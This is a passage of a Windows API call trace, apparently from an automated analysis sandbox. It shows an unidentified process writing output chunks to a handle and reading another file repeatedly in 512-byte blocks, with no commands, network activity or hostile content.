(hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] GetFileType (hFile=0x50) returned 0x1 [0132.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.988] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.988] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.988] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.989] GetFileType (hFile=0x50) returned 0x1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.989] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, 
lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile 
(in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.990] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 
[0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.991] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, 
lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 
lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.992] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: 
lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.993] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, 
lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.994] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.995] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.996] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: 